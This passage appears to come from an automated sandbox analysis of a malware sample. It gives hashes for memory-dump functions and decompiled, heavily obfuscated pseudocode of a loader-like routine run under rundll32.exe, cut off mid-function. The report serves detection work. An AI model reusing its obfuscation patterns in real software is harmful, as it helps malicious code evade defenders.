Function 02271967, Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.240076891.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d496aaf9737dd9040203ca25982ef00af11931fa603b3a3eaa8287a0f772126f
Instruction ID: 63f7a58e7b2151d140e878fa5c6f0b36885db4813b182c3bb065558d934aa578
Opcode Fuzzy Hash: d496aaf9737dd9040203ca25982ef00af11931fa603b3a3eaa8287a0f772126f
Instruction Fuzzy Hash: 07416E72C20614EBEB14CF78C9CA7CA3A70EF00334F248399AC789D1D6C3395661DA94

Uniqueness

Uniqueness Score: -1.00%

Function 022788BA, Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.240076891.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9408914b7e626d52f05bbd282e7e988d0072ea341ec3d82d84db4da1002100f3
Instruction ID: ac559f9bfb25b094f124f1dc237566fe46797945d488a92c01e57ba6fe59ab3e
Opcode Fuzzy Hash: 9408914b7e626d52f05bbd282e7e988d0072ea341ec3d82d84db4da1002100f3
Instruction Fuzzy Hash: B5319C72924A099BEB04CE78CC893DE7761FF80339F24C35AEC359A2D1D77886518B48

Uniqueness

Uniqueness Score: -1.00%

Function 022727D4, Relevance: .1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.240076891.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 60262cc59c0515fe76608e882f2625138d0fbd792c4745c0f20dbd6a2c004b33
Instruction ID: c6e4dbb9877591ccefa66ae906ca5efa434ada19a044ca1c802aeca07a489953
Opcode Fuzzy Hash: 60262cc59c0515fe76608e882f2625138d0fbd792c4745c0f20dbd6a2c004b33
Instruction Fuzzy Hash: 2A317073924608AFEB04CF74CD863DA3B64EF50335F29C365EC298E0D9D37996909A54

Uniqueness

Uniqueness Score: -1.00%

Function 022713C5, Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.240076891.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f7955dea17897fe3643e446ce251d4f90cae95f15a659bd5de779e5c9b3669b3
Instruction ID: 0097241b08623b9451c104d71f44cd3c044fcedf75f4fcedc8595c94fbab2262
Opcode Fuzzy Hash: f7955dea17897fe3643e446ce251d4f90cae95f15a659bd5de779e5c9b3669b3
Instruction Fuzzy Hash: AF31A972C10629ABEB04CE79CC8979A7B71EF40770F14C36AAC28994D9C7749660DAA4

Uniqueness

Uniqueness Score: -1.00%

Function 02272566, Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.240076891.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d9f2a872924e3946419181a18b576f1bc412e886eb09c29eb84efba224b2e0d
Instruction ID: 0fa6a9e355fad797dbeea6f170a7c398159062acb65c294cb3534c4c97e0c1e3
Opcode Fuzzy Hash: 2d9f2a872924e3946419181a18b576f1bc412e886eb09c29eb84efba224b2e0d
Instruction Fuzzy Hash: 443183B3C206059BEB008E78CD863CA7B70EF50374F298365AC38DE1D5D37986919A94

Uniqueness

Uniqueness Score: -1.00%

Function 022792B2, Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.240076891.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 377b6065eaa96f6382e610e702929000c340969e1a3c2249ec044ad4b0ffd56c
Instruction ID: b7332c20318acd6bb712f8b73957e2c0f5082368ee454c22b56589be0713f70d
Opcode Fuzzy Hash: 377b6065eaa96f6382e610e702929000c340969e1a3c2249ec044ad4b0ffd56c
Instruction Fuzzy Hash: 7431C1328A0704EBFB04CF38D9857CA7BB0EF41328F54827ADC199D0DAE3794610DA55

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exe PID: 5572 Parent PID: 5408 rundll32.exeCOMMON

Executed Functions

Function 00EE5F16, Relevance: 2.8, APIs: 1, Instructions: 1269
memoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 75%

			E00EE5F16(void* __eax, signed int __ebx, void* __ecx, signed int __edx, signed int __esi, signed int _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* __edi;
				signed int _t610;
				void* _t612;
				signed int _t613;
				intOrPtr _t619;
				void* _t626;
				void* _t628;
				void* _t630;
				signed int _t631;
				signed int _t633;
				signed int _t636;
				signed int _t638;
				void* _t640;
				intOrPtr _t641;
				signed int _t644;
				void* _t646;
				signed int _t647;
				signed int _t650;
				signed int _t652;
				signed int _t653;
				intOrPtr _t656;
				signed int _t658;
				signed int _t661;
				signed int _t665;
				void* _t667;
				signed int _t668;
				signed int _t671;
				signed int _t675;
				signed int _t677;
				void* _t679;
				signed int _t680;
				signed int _t682;
				signed int _t684;
				signed int _t689;
				void* _t691;
				signed int _t692;
				signed int _t698;
				signed int _t701;
				signed int _t706;
				void* _t708;
				intOrPtr _t709;
				signed int _t711;
				void* _t713;
				signed int _t714;
				signed int _t717;
				intOrPtr _t720;
				signed int _t722;
				void* _t724;
				signed int _t726;
				intOrPtr _t729;
				void* _t730;
				signed int _t733;
				void* _t739;
				void* _t741;
				void* _t742;
				signed int _t744;
				void* _t746;
				signed int _t747;
				signed int _t753;
				signed int _t756;
				signed int _t760;
				void* _t762;
				signed int _t767;
				signed int _t771;
				void* _t773;
				void* _t775;
				void* _t776;
				intOrPtr _t778;
				signed int _t781;
				signed int _t785;
				intOrPtr _t788;
				signed int _t791;
				intOrPtr _t794;
				signed int _t797;
				signed int _t813;
				signed int _t816;
				void* _t819;
				signed int _t821;
				signed int _t824;
				void* _t827;
				void* _t828;
				void* _t830;
				signed int _t836;
				signed int _t840;
				signed int _t842;
				signed int _t844;
				signed int _t851;
				signed int _t856;
				signed int _t859;
				signed int _t862;
				signed int _t865;
				signed int _t867;
				signed int _t869;
				signed int _t875;
				signed int _t882;
				void* _t888;
				signed int _t889;
				signed int _t893;
				signed int _t896;
				signed int _t901;
				signed int _t906;
				signed int _t908;
				signed int _t916;
				signed int _t920;
				signed int _t924;
				signed int _t926;
				signed int _t928;
				signed int _t931;
				signed int _t934;
				signed int _t936;
				signed int _t939;
				signed int _t945;
				signed int _t947;
				signed int _t950;
				signed int _t953;
				signed int _t955;
				signed int _t958;
				void* _t966;
				signed int _t969;
				signed int _t975;
				signed int _t977;
				signed int _t979;
				signed int _t981;
				signed int _t986;
				signed int _t987;
				signed int _t1002;
				signed int _t1005;
				signed int _t1009;
				signed int _t1012;
				signed int _t1015;
				signed int _t1018;
				signed int _t1020;
				signed int _t1023;
				signed int _t1026;
				signed int _t1028;
				signed int _t1031;
				signed int _t1034;
				signed int _t1035;
				void* _t1036;
				long _t1041;
				void* _t1043;
				signed int _t1045;
				signed int _t1052;
				signed int _t1054;
				signed int _t1057;
				signed int _t1060;
				signed int _t1063;
				signed int _t1065;
				signed int _t1068;
				void* _t1069;
				signed int _t1071;
				signed int _t1074;
				void* _t1077;
				signed int _t1078;
				signed int _t1081;
				signed int _t1085;
				void* _t1089;
				signed int _t1091;
				void* _t1097;
				void* _t1102;
				signed int _t1103;
				signed int _t1106;
				void* _t1109;
				signed int _t1112;
				signed int _t1119;
				signed int* _t1120;
				signed int* _t1121;
				signed int* _t1122;
				signed int* _t1123;
				signed int* _t1124;
				signed int* _t1125;
				signed int* _t1126;
				signed int* _t1127;
				signed int* _t1128;
				signed int* _t1129;
				signed int* _t1130;
				signed int* _t1131;
				signed int* _t1132;
				signed int* _t1133;
				signed int* _t1134;
				signed int* _t1136;
				signed int* _t1139;
				signed int* _t1140;
				signed int* _t1141;
				signed int* _t1142;
				signed int* _t1143;
				signed int* _t1144;

				_t1063 = __esi;
				_t813 = __ebx;
				_push(__eax);
				 *_t1119 =  *_t1119 & 0x00000000;
				 *_t1119 =  *_t1119 + _t1102;
				_t1103 = _t1119;
				_t1120 = _t1119 + 0xfffffff0;
				_push(_t1103);
				 *_t1120 =  *_t1120 & 0x00000000;
				 *_t1120 =  *_t1120 + __ecx;
				_push(__ecx);
				 *_t1120 =  *_t1120 & 0x00000000;
				 *_t1120 =  *_t1120 ^ __edx;
				_push(_t1103);
				 *_t1120 =  *_t1120 ^ _t1103;
				 *_t1120 =  *_t1120 ^ __ebx + 0x0041cca8;
				_v16 = _v16 & 0x00000000;
				_push(_v16);
				 *_t1120 =  *_t1120 + __ebx + 0x41cd5f;
				_push( *((intOrPtr*)(__ebx + 0x41f068))());
				_pop( *_t7);
				_push(_v16);
				_pop( *_t9);
				_pop( *_t10);
				_t920 = _v16;
				_t1121 = _t1120 - 0xfffffffc;
				_push(__esi);
				 *_t1121 =  *_t1121 ^ __esi;
				 *_t1121 =  *_t1120;
				_push(_v16);
				 *_t1121 = _t920;
				_push(_t1002);
				 *_t1121 =  *_t1121 - _t1002;
				 *_t1121 =  *_t1121 ^ __ebx + 0x0041c01b;
				_t610 =  *((intOrPtr*)(__ebx + 0x41f060))();
				_push(_v16);
				 *_t1121 = _t610;
				_push(__esi);
				 *_t1121 =  *_t1121 & 0x00000000;
				 *_t1121 =  *_t1121 + __ebx + 0x41c678;
				_t612 =  *((intOrPtr*)(__ebx + 0x41f060))();
				_pop( *_t18);
				_push(_t920);
				 *_t20 = _t612;
				_v20 = _v20 + _v20;
				_push(_v20);
				_pop(_t613);
				_v20 = _t613;
				_t836 = 0 ^  *(__ebx + 0x41c55d);
				if(_t836 > _v20) {
					_push(_v12);
					 *_t1121 = __ebx + 0x41c01b;
					_push(_t1103);
					 *_t1121 =  *_t1121 ^ _t1103;
					 *_t1121 =  *_t1121 + __ebx + 0x41c678;
					_push( *((intOrPtr*)(__ebx + 0x41f064))());
					_pop( *_t31);
					_push(_v20);
					_pop( *_t33);
				}
				_pop( *_t34);
				_t924 = _v20;
				 *_t1121 =  *_t1121 & 0x00000000;
				 *_t1121 =  *_t1121 + _t924;
				 *_t1121 =  *_t1121 & 0x00000000;
				 *_t1121 =  *_t1121 | _t813 + 0x0041c8b2;
				 *_t1121 =  *_t1121 & 0x00000000;
				 *_t1121 =  *_t1121 + _t813 + 0x41d167;
				_t619 =  *((intOrPtr*)(_t813 + 0x41f068))(_t924, _t924, _t836);
				_v12 = _t836;
				 *((intOrPtr*)(_t813 + 0x41c883)) = _t619;
				 *_t1121 = _t813 + 0x41c565;
				_v12 = 0;
				 *_t1121 =  *_t1121 | _t813 + 0x0041c574;
				_push( *((intOrPtr*)(_t813 + 0x41f060))(_v12, _v20));
				_pop( *_t48);
				_push(_v20);
				_pop( *_t50);
				_pop( *_t51);
				 *_t1121 =  *_t1121 - _t1103;
				 *_t1121 =  *_t1121 ^ _v20;
				 *_t1121 =  *_t1121 ^ _t813;
				 *_t1121 =  *_t1121 + _t813 + 0x41cd20;
				_push( *((intOrPtr*)(_t813 + 0x41f060))(_t813, _t1103));
				_pop( *_t55);
				_push(_v16);
				_pop( *_t57);
				_t626 =  *((intOrPtr*)(_t813 + 0x41f060))();
				_v16 = _v16 & 0x00000000;
				 *_t1121 =  *_t1121 + _t626;
				_v16 = _v16 & 0x00000000;
				 *_t1121 =  *_t1121 + _t813 + 0x41c3ee;
				_t628 =  *((intOrPtr*)(_t813 + 0x41f060))(_v16, _v16);
				 *_t1121 =  *_t1121 ^ _t924;
				 *_t1121 =  *_t1121 + _t628;
				_v12 = _v12 & 0x00000000;
				 *_t1121 =  *_t1121 | _t813 + 0x0041cfe9;
				_t630 =  *((intOrPtr*)(_t813 + 0x41f060))(_v12, _t924);
				_pop( *_t72);
				_t840 = _v20;
				 *_t74 = _t630;
				_v20 = _v20 + _t840;
				_push(_v20);
				_pop(_t631);
				_t1065 = _t1063;
				_t842 = _t840 & 0x00000000 | _t1103 & 0x00000000 ^  *(_t813 + 0x41ca09);
				_t1106 = _t1103;
				if(_t842 > _t631) {
					 *_t1121 =  *_t1121 & 0x00000000;
					 *_t1121 =  *_t1121 + _t813 + 0x41c3ee;
					 *_t1121 = _t813 + 0x41cfe9;
					_t631 =  *((intOrPtr*)(_t813 + 0x41f064))(_v12, _t813);
					_push(_t924);
					 *(_t813 + 0x41c365) =  *(_t813 + 0x41c365) & 0x00000000;
					 *(_t813 + 0x41c365) =  *(_t813 + 0x41c365) ^ _t924 & 0x00000000 ^ _t631;
				}
				_t633 = _t631 & 0x00000000 ^  *_t1121;
				_t1122 =  &(_t1121[1]);
				 *_t1122 = _t1002;
				 *(_t813 + 0x41d240) = _t633;
				_t1005 = 0;
				_pop( *_t88);
				_t926 = 0 ^ _v20;
				_pop( *_t90);
				_t844 = _t842 & 0x00000000 ^ _v16;
				 *_t1122 =  *_t1122 & 0x00000000;
				 *_t1122 =  *_t1122 ^ _t926;
				 *_t1122 =  *_t1122 & 0x00000000;
				 *_t1122 =  *_t1122 | _t844;
				 *_t1122 =  *_t1122 & 0x00000000;
				 *_t1122 =  *_t1122 ^ _t813 + 0x0041c624;
				_v12 = _v12 & 0x00000000;
				 *_t1122 =  *_t1122 ^ _t813 + 0x0041d36b;
				_t636 =  *((intOrPtr*)(_t813 + 0x41f068))(_v12, _t926, _t1005, _t633);
				 *(_t813 + 0x41c655) =  *(_t813 + 0x41c655) & 0x00000000;
				 *(_t813 + 0x41c655) =  *(_t813 + 0x41c655) | _t844 -  *_t1122 ^ _t636;
				_t1123 =  &(_t1122[1]);
				_v16 = _v16 & 0x00000000;
				 *_t1123 =  *_t1123 ^  *_t1122;
				_v16 = 0;
				 *_t1123 =  *_t1123 ^ _t813 + 0x0041c891;
				_t638 =  *((intOrPtr*)(_t813 + 0x41f060))(_v16, _v16, _t844);
				 *_t1123 =  *_t1123 - _t1106;
				 *_t1123 =  *_t1123 | _t638;
				_v12 = 0;
				 *_t1123 =  *_t1123 ^ _t813 + 0x0041c30f;
				_t640 =  *((intOrPtr*)(_t813 + 0x41f060))(_v12, _t1106);
				_t851 =  *_t1123;
				_t1124 =  &(_t1123[1]);
				 *_t113 = _t640;
				_v16 = _v16 + _t851;
				_push(_v16);
				_pop(_t641);
				_t928 = _t926;
				_v16 = _t1005;
				if((_t851 & 0x00000000 | _t1005 ^ _v16 |  *(_t813 + 0x41ca38)) > _t641) {
					_v20 = _v20 & 0x00000000;
					 *_t1124 =  *_t1124 | _t813 + 0x0041c891;
					_v12 = 0;
					 *_t1124 =  *_t1124 + _t813 + 0x41c30f;
					_t641 =  *((intOrPtr*)(_t813 + 0x41f064))(_v12, _v20);
				}
				 *_t1124 = _t928;
				 *((intOrPtr*)(_t813 + 0x41c910)) = _t641;
				_t931 = 0;
				_v12 = _t1065;
				_t1068 = _v12;
				_v12 = 0;
				 *_t1124 =  *_t1124 | 0 ^ _a4;
				_v16 = 0;
				 *_t1124 =  *_t1124 | _t813 + 0x0041c9ef;
				_t644 =  *((intOrPtr*)(_t813 + 0x41f060))(_v16, _v12);
				_v12 = 0;
				 *_t1124 =  *_t1124 ^ _t644;
				 *_t1124 = _t813 + 0x41cb65;
				_t646 =  *((intOrPtr*)(_t813 + 0x41f060))(_v20, _v12);
				_t1125 =  &(_t1124[1]);
				_v12 = _t931;
				_push( *_t1124 + _t646);
				_t934 = _v12;
				_pop(_t647);
				_v12 = _t647;
				_t856 = 0 ^  *(_t813 + 0x41c187);
				_t650 = _v12;
				if(_t856 > _t650) {
					_v20 = 0;
					 *_t1125 =  *_t1125 | _t813 + 0x0041c9ef;
					 *_t1125 =  *_t1125 ^ _t856;
					 *_t1125 =  *_t1125 + _t813 + 0x41cb65;
					_t650 =  *((intOrPtr*)(_t813 + 0x41f064))(_t856, _v20);
					_v16 = _t1068;
					 *(_t813 + 0x41c651) =  *(_t813 + 0x41c651) & 0x00000000;
					 *(_t813 + 0x41c651) =  *(_t813 + 0x41c651) | _t1068 ^ _v16 | _t650;
					_t1068 = _v16;
				}
				_t652 = _t650 & 0x00000000 ^  *_t1125;
				_t1126 = _t1125 - 0xfffffffc;
				 *_t162 = _t652;
				_v16 = _v16 +  *((intOrPtr*)(_t652 + 0x3c));
				_push(_v16);
				_pop(_t653);
				_t936 = _t934;
				 *_t1126 = _t653;
				 *_t1126 =  *_t1126 & 0x00000000;
				 *_t1126 =  *_t1126 ^ _t813 + 0x0041c16e;
				 *_t1126 = _t813 + 0x41ce8a;
				_t656 =  *((intOrPtr*)(_t813 + 0x41f068))(_v20, _t1068, _v20);
				 *_t1126 = _t1106;
				 *((intOrPtr*)(_t813 + 0x41c0cc)) = _t656;
				_t1109 = 0;
				_t658 =  *_t1126;
				_t1127 =  &(_t1126[1]);
				 *_t1127 = _t658;
				 *_t1127 =  *_t1127 - _t856;
				 *_t1127 =  *_t1127 ^ _t658;
				 *_t1127 =  *_t1127 - _t936;
				 *_t1127 =  *_t1127 + _t813 + 0x41c791;
				_v12 = _v12 & 0x00000000;
				 *_t1127 =  *_t1127 ^ _t813 + 0x0041ca02;
				_t661 =  *((intOrPtr*)(_t813 + 0x41f068))(_v12, _t936, _t856, _v16);
				 *_t1127 = _t936;
				 *(_t813 + 0x41c9e0) = 0 ^ _t661;
				_t939 = 0;
				_t1128 = _t1127 - 0xfffffffc;
				_v20 = _t813;
				_t1009 =  *_t1127;
				_t816 = _v20;
				_v12 = 0;
				 *_t1128 =  *_t1128 | _t816 + 0x0041c000;
				_t665 =  *((intOrPtr*)(_t816 + 0x41f060))(_v12);
				 *_t1128 =  *_t1128 ^ _t1009;
				 *_t1128 = _t665;
				 *_t1128 =  *_t1128 - _t1009;
				 *_t1128 =  *_t1128 ^ _t816 + 0x0041cc73;
				_t667 =  *((intOrPtr*)(_t816 + 0x41f060))(_t1009, _t1009);
				_t1129 =  &(_t1128[1]);
				 *_t1129 =  *_t1129 ^ _t1068;
				_t1069 = _t667;
				_t668 = _t1069 + (_t856 & 0x00000000 |  *_t1128);
				_t1071 = 0;
				_v20 = _t1009;
				_t859 = 0 ^  *(_t816 + 0x41c250);
				_t1012 = _v20;
				if(_t859 > _t668) {
					 *_t1129 =  *_t1129 - _t1012;
					 *_t1129 =  *_t1129 ^ _t816 + 0x0041c000;
					_v12 = 0;
					 *_t1129 =  *_t1129 | _t816 + 0x0041cc73;
					_t668 =  *((intOrPtr*)(_t816 + 0x41f064))(_v12, _t1012);
				}
				 *(_t816 + 0x41c695) =  *(_t816 + 0x41c695) & 0x00000000;
				 *(_t816 + 0x41c695) =  *(_t816 + 0x41c695) | _t859 & 0x00000000 ^ _t668;
				_t862 = _t859;
				 *_t1129 =  *_t1129 - _t1071;
				 *_t1129 =  *_t1129 + ( *(_t1012 + 6) & 0x0000ffff);
				 *_t1129 = _t816 + 0x41ca88;
				_t671 =  *((intOrPtr*)(_t816 + 0x41f060))(_v12, _t1071);
				_v20 = _t862;
				 *(_t816 + 0x41d151) =  *(_t816 + 0x41d151) & 0x00000000;
				 *(_t816 + 0x41d151) =  *(_t816 + 0x41d151) | _t862 ^ _v20 ^ _t671;
				_t865 = _v20;
				_pop( *_t211);
				_v8 = _v8 & 0x00000000;
				_v8 = _v8 ^ (_t816 & 0x00000000 | 0 ^ _v16);
				_t819 = _t816;
				 *_t1129 =  *_t1129 & 0x00000000;
				 *_t1129 =  *_t1129 ^ _t819 + 0x0041c863;
				_t675 =  *((intOrPtr*)(_t819 + 0x41f060))(_t819);
				 *(_t819 + 0x41c2ac) =  *(_t819 + 0x41c2ac) & 0x00000000;
				 *(_t819 + 0x41c2ac) =  *(_t819 + 0x41c2ac) | _t1109 -  *_t1129 ^ _t675;
				_t1112 = _t1109;
				 *_t1129 =  *_t1129 - _t865;
				 *_t1129 =  *_t1129 ^ _t1012;
				 *_t1129 = _t819 + 0x41ca0d;
				_t677 =  *((intOrPtr*)(_t819 + 0x41f060))(_v12, _t865);
				 *_t1129 = _t677;
				 *_t1129 = _t819 + 0x41cbe6;
				_t679 =  *((intOrPtr*)(_t819 + 0x41f060))(_v12, _v20);
				_t867 =  *_t1129;
				_t1130 = _t1129 - 0xfffffffc;
				 *_t230 = _t679;
				_v16 = _v16 + _t867;
				_push(_v16);
				_pop(_t680);
				_t821 = _t819;
				_t869 = _t867 & 0x00000000 | _t1071 & 0x00000000 ^  *(_t821 + 0x41d053);
				_t1074 = _t1071;
				if(_t869 > _t680) {
					_t235 = _t821 + 0x41ca0d; // 0x41ca0d
					_v12 = 0;
					 *_t1130 =  *_t1130 | _t235;
					_t238 = _t821 + 0x41cbe6; // 0x41cbe6
					 *_t1130 =  *_t1130 & 0x00000000;
					 *_t1130 =  *_t1130 + _t238;
					_t680 =  *((intOrPtr*)(_t821 + 0x41f064))(_t1074, _v12);
				}
				 *_t1130 = _t1012;
				 *(_t821 + 0x41c918) = 0 ^ _t680;
				_t1015 = 0;
				_v16 = _t869;
				_v16 = 0;
				 *_t1130 =  *_t1130 + (_t939 & 0x00000000 | _t869 ^ _v16 |  *(_t1015 + 0x54));
				_t247 = _t821 + 0x41d093; // 0x41d093
				 *_t1130 =  *_t1130 & 0x00000000;
				 *_t1130 =  *_t1130 | _t247;
				_t682 =  *((intOrPtr*)(_t821 + 0x41f060))(_v16);
				 *_t1130 = _t1015;
				 *(_t821 + 0x41c4f0) = 0 ^ _t682;
				_t1018 = 0;
				 *_t250 = _t821;
				_t1020 = _t1018 & 0x00000000 ^ (_t1074 ^  *_t1130 |  *(_t821 + 0x41c166));
				_t1077 = _t1074;
				 *_t1130 =  *_t1130 & 0x00000000;
				 *_t1130 =  *_t1130 ^ _v16;
				_t253 = _t821 + 0x41cfd9; // 0x41cfd9
				_v20 = 0;
				 *_t1130 =  *_t1130 | _t253;
				_t684 =  *((intOrPtr*)(_t821 + 0x41f060))(_v20, _t1077);
				_v20 = _t1020;
				 *(_t821 + 0x41c323) =  *(_t821 + 0x41c323) & 0x00000000;
				 *(_t821 + 0x41c323) =  *(_t821 + 0x41c323) | _t1020 ^ _v20 ^ _t684;
				_t1023 = _v20;
				_t1131 =  &(_t1130[1]);
				 *_t1131 = _t684;
				_t1078 = _a4;
				_v12 = _v12 & 0x00000000;
				 *_t1131 =  *_t1131 |  *_t1130;
				_t268 = _t821 + 0x41ca9e; // 0x41ca9e
				_v12 = _v12 & 0x00000000;
				 *_t1131 =  *_t1131 | _t268;
				_t689 =  *((intOrPtr*)(_t821 + 0x41f060))(_v12, _v12, 0);
				 *_t1131 =  *_t1131 & 0x00000000;
				 *_t1131 =  *_t1131 | _t689;
				_t273 = _t821 + 0x41c931; // 0x41c931
				 *_t1131 =  *_t1131 & 0x00000000;
				 *_t1131 =  *_t1131 | _t273;
				_t691 =  *((intOrPtr*)(_t821 + 0x41f060))(_v16);
				 *_t275 = _t1023;
				_v20 = _t821;
				_push(0 + _v16 + _t691);
				_t824 = _v20;
				_pop(_t692);
				_push( *((intOrPtr*)(_t824 + 0x41cccf)));
				_pop( *_t280);
				_push(_v12);
				_pop(_t875);
				if(_t875 > _t692) {
					 *_t1131 = _t824 + 0x41ca9e;
					 *_t1131 =  *_t1131 & 0x00000000;
					 *_t1131 =  *_t1131 ^ _t824 + 0x0041c931;
					_t692 =  *((intOrPtr*)(_t824 + 0x41f064))(_t1078, _v16);
					 *_t286 = _t692;
					_push(_v16);
					_pop( *_t288);
				}
				_pop( *_t289);
				_t945 = _v12;
				_v12 = _t692;
				 *_t1131 = _t875 & 0x00000000 | _t692 ^ _v12 | _t945;
				 *_t1131 =  *_t1131 ^ _t824;
				 *_t1131 =  *_t1131 + _t945;
				_v12 = 0;
				 *_t1131 =  *_t1131 ^ _t824 + 0x0041d1ba;
				 *_t1131 = _t824 + 0x41c856;
				_t698 =  *((intOrPtr*)(_t824 + 0x41f068))(_v16, _v12, _t824, _v12);
				_v20 = _t1078;
				 *(_t824 + 0x41c0c8) = 0 ^ _t698;
				_t1081 = _v20;
				_pop( *_t304);
				_t947 = 0 ^ _v20;
				_t879 = 0 ^  *_t1131;
				_t1132 = _t1131 - 0xfffffffc;
				if(_t1023 != _t1081) {
					 *_t1132 =  *_t1132 - _t1023;
					 *_t1132 =  *_t1132 ^ _t879;
					_v20 = _v20 & 0x00000000;
					 *_t1132 =  *_t1132 + _t947;
					_v16 = 0;
					 *_t1132 =  *_t1132 ^ _t824 + 0x0041c7a9;
					_t739 =  *((intOrPtr*)(_t824 + 0x41f060))(_v16, _v20, _t1023);
					_v12 = 0;
					 *_t1132 =  *_t1132 + _t739;
					 *_t1132 =  *_t1132 & 0x00000000;
					 *_t1132 =  *_t1132 ^ _t824 + 0x0041d026;
					_t741 =  *((intOrPtr*)(_t824 + 0x41f060))(_t824, _v12);
					_t1139 = _t1132 - 0xfffffffc;
					 *_t317 = _t741;
					_v20 = _v20 + (_t879 & 0x00000000) +  *_t1132;
					_push(_v20);
					_pop(_t742);
					_t1045 = _t1023;
					_push(0);
					 *_t1139 = _t1045;
					_t906 = 0 ^  *(_t824 + 0x41c244);
					if(_t906 > _t742) {
						 *_t1139 =  *_t1139 ^ _t906;
						 *_t1139 =  *_t1139 | _t824 + 0x0041c7a9;
						 *_t1139 =  *_t1139 & 0x00000000;
						 *_t1139 =  *_t1139 + _t824 + 0x41d026;
						_t797 =  *((intOrPtr*)(_t824 + 0x41f064))(_t824, _t906);
						_push(0);
						 *_t1139 = _t947;
						 *(_t824 + 0x41cf47) = 0 ^ _t797;
					}
					_pop( *_t326);
					_t969 = _v12;
					_t908 =  *_t1139;
					_t1140 = _t1139 - 0xfffffffc;
					do {
						asm("movsb");
						_v12 = 0;
						 *_t1140 =  *_t1140 + _t908;
						_v12 = _v12 & 0x00000000;
						 *_t1140 =  *_t1140 + _t969;
						 *_t1140 =  *_t1140 - _t969;
						 *_t1140 =  *_t1140 | _t824 + 0x0041c831;
						_t744 =  *((intOrPtr*)(_t824 + 0x41f060))(_t969, _v12, _v12);
						 *_t1140 =  *_t1140 ^ _t1112;
						 *_t1140 =  *_t1140 ^ _t744;
						 *_t1140 =  *_t1140 & 0x00000000;
						 *_t1140 =  *_t1140 ^ _t824 + 0x0041c7fa;
						_t746 =  *((intOrPtr*)(_t824 + 0x41f060))(_t1081, _t1112);
						_t1141 =  &(_t1140[1]);
						 *_t337 = _t746;
						_v20 = _v20 +  *_t1140;
						_push(_v20);
						_pop(_t747);
						_t1081 = _t1081;
						_v12 = _t747;
						if((0 ^  *(_t824 + 0x41c054)) > _v12) {
							 *_t1141 = _t824 + 0x41c831;
							 *_t1141 = _t824 + 0x41c7fa;
							_t794 =  *((intOrPtr*)(_t824 + 0x41f064))(_v16, _v16);
							_v16 = _t969;
							 *((intOrPtr*)(_t824 + 0x41c254)) = _t794;
						}
						_pop( *_t352);
						_t969 = 0 + _v12;
						_t1140 = _t1141 - 0xfffffffc;
						_t908 =  *_t1141 - 1;
					} while (_t908 != 0);
					 *_t1140 =  *_t1140 & 0x00000000;
					 *_t1140 =  *_t1140 ^ _t969;
					 *_t1140 =  *_t1140 & 0x00000000;
					 *_t1140 =  *_t1140 ^ _t824 + 0x0041ccd3;
					_v20 = 0;
					 *_t1140 =  *_t1140 ^ _t824 + 0x0041c339;
					_t753 =  *((intOrPtr*)(_t824 + 0x41f068))(_v20, _t908, _t908);
					 *(_t824 + 0x41d2bf) =  *(_t824 + 0x41d2bf) & 0x00000000;
					 *(_t824 + 0x41d2bf) =  *(_t824 + 0x41d2bf) ^ _t969 ^  *_t1140 ^ _t753;
					_t975 =  *_t1140;
					_t1142 = _t1140 - 0xfffffffc;
					_v12 = _t753;
					_t756 = _v12;
					 *_t1142 =  *_t1142 ^ _t756;
					 *_t1142 =  *_t1142 ^ _t975;
					_v20 = _v20 & 0x00000000;
					 *_t1142 =  *_t1142 ^ _t824 + 0x0041c8b7;
					_push( *((intOrPtr*)(_t824 + 0x41f060))(_v20, _t756, _t969));
					_pop( *_t371);
					_push(_v16);
					_pop( *_t373);
					_pop( *_t374);
					_t977 = _t975 & 0x00000000 ^ _v16;
					 *(_t824 + 0x41c60a) = 0x40;
					 *_t1142 = _t977;
					_v16 = 0;
					 *_t1142 =  *_t1142 ^ _t824 + 0x0041c4cb;
					_t760 =  *((intOrPtr*)(_t824 + 0x41f060))(_v16, _v20);
					 *_t1142 = _t760;
					 *_t1142 = _t824 + 0x41c438;
					_t762 =  *((intOrPtr*)(_t824 + 0x41f060))(_v16, _v12);
					_pop( *_t386);
					 *_t1142 =  *_t1142 | _t824;
					_t830 = _t762;
					_t824 = 0;
					_v16 =  *((intOrPtr*)(_t824 + 0x41c166));
					_t916 =  *(_t824 + 0x41d118);
					_t1052 = _v16;
					if(_t916 > _t830 + _v20 + (_t908 & 0x00000000)) {
						_t391 = _t824 + 0x41c4cb; // 0x41c4cb
						 *_t1142 =  *_t1142 - _t916;
						 *_t1142 =  *_t1142 + _t391;
						_t392 = _t824 + 0x41c438; // 0x41c438
						 *_t1142 =  *_t1142 ^ _t977;
						 *_t1142 =  *_t1142 | _t392;
						_t791 =  *((intOrPtr*)(_t824 + 0x41f064))(_t977, _t916);
						_v20 = _t977;
						 *(_t824 + 0x41c583) =  *(_t824 + 0x41c583) & 0x00000000;
						 *(_t824 + 0x41c583) =  *(_t824 + 0x41c583) | _t977 - _v20 ^ _t791;
					}
					_t979 =  *_t1142;
					_t1143 = _t1142 - 0xfffffffc;
					_t401 = _t824 + 0x41c60a; // 0x41c60a
					 *_t1143 =  *_t1143 - _t979;
					 *_t1143 =  *_t1143 ^ _t401;
